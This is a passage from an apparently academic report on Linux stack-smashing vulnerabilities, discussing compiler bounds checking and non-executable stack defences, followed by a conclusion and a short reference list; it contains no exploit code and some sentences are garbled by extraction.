Chapter 5. Prevention and Security By giving the compiler the additional upper and lower bound information, it would then be trivial to do bounds checking before byte copy functions. Despite this benefit, using this approach to implementing bounds checking has the following disadvantages: execution time of resulting code increases by a factor of ten or more[5], register allocation becomes more expensive by a factor of 3:1, new versions of all compiled system libraries and system calls must be provided, and code that interfaces with the hardware directly may be completely incompatible or require special attention. A unique approach to modifying the compiler in this manner involved modifying the compiler to perform the same type of bounds checking, without modifying the representation of pointers. Furthermore, there shall be options to turn the bounds checking mode on or off in a given program. Only one pointer is valid for a given region and one can check whether a pointer arithmetic expression is valid by finding its base pointer’s storage region. This is checked again to insure that the expression’s result points to the same storage region. Despite semifavorable performance statistics, in addition to the general risk involved at modifying the C language at this level, this modification involves patching and recompiling the existing C compiler and its libraries. Furthermore, all previously compiled binaries must be deleted and recompiled with the new libraries. Once this is done, all binaries on the system will execute with respect to this patch. In conclusion, modifying the C language or the C compiler to limit stack smashing opportunities often involves modifying the C language at a nontrivial level. Additionally, the most complex and comprehensive solutions of this nature, despite their long term centralization, still remain largely decentralized and difficult to implement and test in a reasonable amount of time. The more trivial modifications of this nature degenerate simply into compiler warning messages that can only encourage the programmer to modify the program manually.

CPU/OS kernel stack execution privilege
The most centralized approach in preventing some stack smashing vulnerabilities involves modifying an operating system’s kernel segment limit such that it does not cover the actual stack space. This approach effectively removes the kernel’s stack execution permission. This has a fundamental advantages over other countermeasures. As the most centralized method in limiting stack smashing vulnerabilities, no recompilation of C libraries or the actual compiler would be necessary, only the operating system kernel need be recompiled. A practical implementation of this concept on the Linux operating system is described below, this description touches on the details of implementation as well as some of the problems. To remove stack execution privilege in Linux, the operating system dynamic memory allocation stack of the operating system is marked as nonexecutable. Started under such a kernel would have its stack pages also marked nonexecutable. Stack smashing exploits depend on an executable stack when returning back into a memory address which executes an interactive shell. By removing this functionality from the system, some stack smashing vulnerabilities can be stopped. Furthermore, signal handler returns in the Linux operating system require an executable stack. Signal handlers are absolutely crucial in an operating system, thus, a temporary executable stack for signal handlers must be implemented. Thus, buffer overflows in signal handlers would still be possible using this temporarily executable stack. 22

Chapter 5. Prevention and Security By changing the kernel stack execution permissions, it would stop most SUID buffer overflows, excluding those involving signal handlers. A system with a nonexecutable stack also hinders LISP and Objective C development efforts as well as other functional languages might also be affected. Furthermore, every program contains code that performs fundamental operations such as saving and restoring values from CPU registers, performs system calls. In contrast to the formulated stack smashing exploits available, an attack such as this would be impossible to prevent by changing the stack execution privilege. In other words, removing the stack execution permission only prevents today’s stack smashing exploits from working properly. As exploits become more sophisticated, stack execution bits may have little or no relevance in terms of the exploit. As an aside, this type of patch can also be implemented in system CPU hardware. New system architectures could simply have multiple stacks: one for call frames, and one for automatic storage. In conclusion, by removing stack execution from the system kernel, one can attempt to stop the stack smashing problem at the source. However, this approach suffers in implementation because the necessary code is nonportable, standard compiler functions and operating system signal handling behavior is modified and may be unpredictable. In addition to these points, this approach is not proven to stop more sophisticated stack smashing exploits.


Chapter 5. Prevention and Security


Chapter 6. Conclusion
Stack smashing security exploits have become commonplace on Linux machines as a means to gain access to privileged resources. By combining standard operations and conditions of the Linux and C programming language, based on this study, one can see how an unprivileged user can obtain privileged user permissions. Furthermore, with the number of privileged programs that exist in today’s standard Linux distributions combined with the fact that an overflow exploit could be constructed for any one or number of these operating systems. In spite of stack smashing prevalence, a number of things can be done to prevent most stack smashing vulnerabilities. As the level of awareness of stack smashing exploits increases, Linux vendors, programmers, system administrators and users alike, are educating each other. System administrators can implement various configuration methods to lower the possibilities of stack smashing vulnerability exploits. Linux vendors can do their part by making a commitment to be very cautious with privileged binaries installed by default on their specific Linux distribution. Lastly but perhaps the most effective solution can come from programmers who write privileged code. As standards evolve and are accepted for coding safer privileged programs and creating more secure operating systems, programmers can develop more robust code which is less susceptible to stack smashing. With the cooperation of many people in different parts of the Linux community, stack smashing security vulnerabilities can be defeated.


Chapter 6. Conclusion


Appendix A. References
• • •

PC Assembly Book by Paul A. Carter Smashing the stack for fun and profit by Aleph, Phrack Magazine Microprocessors and Interfacing -Programming and Hardware by Douglas V. Hall


Appendix A. References


Sign up to vote on this title
UsefulNot useful